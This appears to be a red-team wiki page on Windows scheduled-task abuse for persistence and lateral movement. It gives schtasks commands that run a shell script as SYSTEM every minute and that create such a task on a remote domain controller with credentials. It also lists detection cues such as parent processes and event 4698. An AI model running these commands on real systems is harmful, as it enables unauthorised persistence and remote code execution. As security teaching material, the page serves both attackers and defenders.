description |
---|
Code execution, privilege escalation, lateral movement and persitence. |
Creating a new scheduled task that will launch shell.cmd every minute:
{% code-tabs %} {% code-tabs-item title="attacker@victim" %}
schtasks /create /sc minute /mo 1 /tn "eviltask" /tr C:\tools\shell.cmd /ru "SYSTEM"
{% endcode-tabs-item %} {% endcode-tabs %}
Note that processes spawned as scheduled tasks have taskeng.exe
process as their parent:
Monitoring and inspecting commandline arguments and established network connections by processes can help uncover suspicious activity:
Also, look for events 4698 indicating new scheduled task creation:
Note that when using schtasks for lateral movement, the processes spawned do not have taskeng.exe as their parent, rather - svchost:
{% code-tabs %} {% code-tabs-item title="attacker@victim" %}
schtasks /create /sc minute /mo 1 /tn "eviltask" /tr calc /ru "SYSTEM" /s dc-mantvydas /u user /p password
{% endcode-tabs-item %} {% endcode-tabs %}
{% embed url="https://attack.mitre.org/wiki/Technique/T1053" %}
{% embed url="https://docs.microsoft.com/en-us/windows/desktop/taskschd/schtasks" %}